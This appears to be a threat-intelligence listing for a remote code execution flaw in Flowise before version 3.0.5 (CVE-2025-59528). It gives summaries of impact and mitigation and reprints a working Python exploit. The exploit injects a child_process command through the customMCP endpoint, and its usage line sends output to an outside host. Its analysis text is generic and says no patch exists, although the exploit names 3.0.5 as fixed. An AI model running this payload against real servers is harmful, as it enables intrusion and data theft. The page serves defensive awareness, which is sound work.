Flowise 3.0.4 - Remote Code Execution (RCE)
Flowise 3.0.4 - Remote Code Execution (RCE)
AI Analysis
Technical Summary
Flowise 3.0.4 suffers from a critical remote code execution vulnerability that allows attackers to execute arbitrary commands on the server hosting the application. Flowise is a web-based tool used for building AI workflows, and the vulnerability likely stems from insufficient input validation or unsafe deserialization within the web interface or API endpoints. The exploit enables attackers to bypass authentication or leverage existing access to inject and execute malicious code remotely, potentially leading to full system compromise. The availability of a Python-based exploit code on Exploit-DB facilitates rapid weaponization by threat actors. Although no official patches or mitigations have been published, the vulnerability's critical nature and the presence of exploit code indicate a high risk of exploitation. This vulnerability impacts the confidentiality, integrity, and availability of affected systems, as attackers can steal sensitive data, alter workflows, or disrupt services. Organizations relying on Flowise for AI workflow orchestration must urgently assess exposure and implement defensive controls. The lack of a CVSS score requires severity assessment based on impact and exploitability, which is critical in this case.
Potential Impact
For European organizations, exploitation of this RCE vulnerability in Flowise 3.0.4 could lead to unauthorized access to sensitive AI workflows and data, disruption of AI-driven business processes, and potential lateral movement within internal networks. Confidential data processed or stored by Flowise could be exfiltrated or manipulated, undermining data integrity and compliance with regulations such as GDPR. The availability of AI services may be compromised, affecting operational continuity. Given the increasing adoption of AI tools in sectors like finance, healthcare, and manufacturing across Europe, the impact could be significant. Attackers could leverage this vulnerability to deploy ransomware, steal intellectual property, or conduct espionage. The presence of exploit code lowers the barrier for attackers, increasing the likelihood of targeted attacks against European entities using Flowise.
Mitigation Recommendations
Immediate mitigation steps include isolating Flowise instances from public internet exposure and restricting access to trusted networks only. Organizations should implement strict input validation and web application firewalls (WAFs) to detect and block suspicious payloads targeting Flowise endpoints. Monitoring network traffic and logs for unusual activity related to Flowise is critical. Until an official patch is released, consider disabling or limiting features that accept external input or executing workflows remotely. Employ network segmentation to contain potential breaches. Regularly back up AI workflow configurations and data to enable recovery in case of compromise. Engage with Flowise developers or community to obtain updates or patches as soon as they become available. Additionally, conduct penetration testing focused on Flowise to identify and remediate other potential weaknesses.
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Italy
Indicators of Compromise
- exploit-code: # Exploit Title: Flowise 3.0.4 - Remote Code Execution (RCE) # Date: 10/11/2025 # Exploit Author: [nltt0] (https://github.com/nltt-br)) # Vendor Homepage: https://flowiseai.com/ # Software Link: https://github.com/FlowiseAI/Flowise # Version: < 3.0.5 # CVE: CVE-2025-59528 from requests import post, session from argparse import ArgumentParser banner = r""" _____ _ _____ / __ \ | | / ___| | / \/ __ _| | __ _ _ __ __ _ ___ ___ \ `--. | | / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \ | \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ / \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/ __/ | |___/ by nltt0 """ try: parser = ArgumentParser(description='CVE-2025-59528 [Flowise < 3.0.5]', usage="python CVE-2025-58434.py --email xtz@local --password Test@2025 --url http://localhost:3000 --cmd \"http://localhost:1337/`whoami`\"") parser.add_argument('-e', '--email', required=True, help='Registered email') parser.add_argument('-p', '--password', required=True) parser.add_argument('-u', '--url', required=True) parser.add_argument('-c', '--cmd', required=True) args = parser.parse_args() email = args.email password = args.password url = args.url cmd = args.cmd def login(email, url): session = session() url_format = "{}/api/v1/auth/login".format(url) headers = {"x-request-from": "internal", "Accept-Language": "pt-BR,pt;q=0.9", "Accept": "application/json, text/plain, */*", "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36", "Origin": "http://workflow.flow.hc", "Referer": "http://workflow.flow.hc/signin", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"} data={"email": email, "password": password} r = session.post(url_format, headers=headers, json=data) return session, r def rce(email, url, password, cmd): session, status_code = login(email, url) url_format = "{}/api/v1/node-load-method/customMCP".format(url) command = f'({{x:(function(){{const cp = process.mainModule.require("child_process");cp.execSync("{cmd}");return 1;}})()}})' data = { "loadMethod": "listActions", "inputs": { "mcpServerConfig": command } } r = session.post(url_format, json=data) if r.status_code == 401: session.headers["x-request-from"] = "internal" session.post(url_format, json=data) print(f"[x] Command executed [{cmd}]") rce(email, url, password, cmd) except Exception as e: print('Error in {}'.format(e))
Flowise 3.0.4 - Remote Code Execution (RCE)
Description
Flowise 3.0.4 - Remote Code Execution (RCE)
AI-Powered Analysis
Technical Analysis
Flowise 3.0.4 suffers from a critical remote code execution vulnerability that allows attackers to execute arbitrary commands on the server hosting the application. Flowise is a web-based tool used for building AI workflows, and the vulnerability likely stems from insufficient input validation or unsafe deserialization within the web interface or API endpoints. The exploit enables attackers to bypass authentication or leverage existing access to inject and execute malicious code remotely, potentially leading to full system compromise. The availability of a Python-based exploit code on Exploit-DB facilitates rapid weaponization by threat actors. Although no official patches or mitigations have been published, the vulnerability's critical nature and the presence of exploit code indicate a high risk of exploitation. This vulnerability impacts the confidentiality, integrity, and availability of affected systems, as attackers can steal sensitive data, alter workflows, or disrupt services. Organizations relying on Flowise for AI workflow orchestration must urgently assess exposure and implement defensive controls. The lack of a CVSS score requires severity assessment based on impact and exploitability, which is critical in this case.
Potential Impact
For European organizations, exploitation of this RCE vulnerability in Flowise 3.0.4 could lead to unauthorized access to sensitive AI workflows and data, disruption of AI-driven business processes, and potential lateral movement within internal networks. Confidential data processed or stored by Flowise could be exfiltrated or manipulated, undermining data integrity and compliance with regulations such as GDPR. The availability of AI services may be compromised, affecting operational continuity. Given the increasing adoption of AI tools in sectors like finance, healthcare, and manufacturing across Europe, the impact could be significant. Attackers could leverage this vulnerability to deploy ransomware, steal intellectual property, or conduct espionage. The presence of exploit code lowers the barrier for attackers, increasing the likelihood of targeted attacks against European entities using Flowise.
Mitigation Recommendations
Immediate mitigation steps include isolating Flowise instances from public internet exposure and restricting access to trusted networks only. Organizations should implement strict input validation and web application firewalls (WAFs) to detect and block suspicious payloads targeting Flowise endpoints. Monitoring network traffic and logs for unusual activity related to Flowise is critical. Until an official patch is released, consider disabling or limiting features that accept external input or executing workflows remotely. Employ network segmentation to contain potential breaches. Regularly back up AI workflow configurations and data to enable recovery in case of compromise. Engage with Flowise developers or community to obtain updates or patches as soon as they become available. Additionally, conduct penetration testing focused on Flowise to identify and remediate other potential weaknesses.
Affected Countries
Technical Details
- Edb Id
- 52440
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Flowise 3.0.4 - Remote Code Execution (RCE)
# Exploit Title: Flowise 3.0.4 - Remote Code Execution (RCE) # Date: 10/11/2025 # Exploit Author: [nltt0] (https://github.com/nltt-br)) # Vendor Homepage: https://flowiseai.com/ # Software Link: https://github.com/FlowiseAI/Flowise # Version: < 3.0.5 # CVE: CVE-2025-59528 from requests import post, session from argparse import ArgumentParser banner = r""" _____ _ _____ / __ \ | | / ___| | / \/ __ _| | __ _ _ __ __ _ ___... (2390 more characters)
Threat ID: 6904bcc1f54b4a89977a2e93
Added to database: 10/31/2025, 1:42:25 PM
Last enriched: 12/21/2025, 7:24:28 AM
Last updated: 2/7/2026, 7:01:11 AM
Views: 377
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
ThreatsDay Bulletin: Codespaces RCE, AsyncRAT C2, BYOVD Abuse, AI Cloud Intrusions & 15+ Stories
LowClaude Opus 4.6 Finds 500+ High-Severity Flaws Across Major Open-Source Libraries
HighCritical SmarterMail Vulnerability Exploited in Ransomware Attacks
CriticalResearchers Expose Network of 150 Cloned Law Firm Websites in AI-Powered Scam Campaign
MediumItaly Averted Russian-Linked Cyberattacks Targeting Winter Olympics Websites, Foreign Minister Says
MediumActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console in Console -> Billing for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.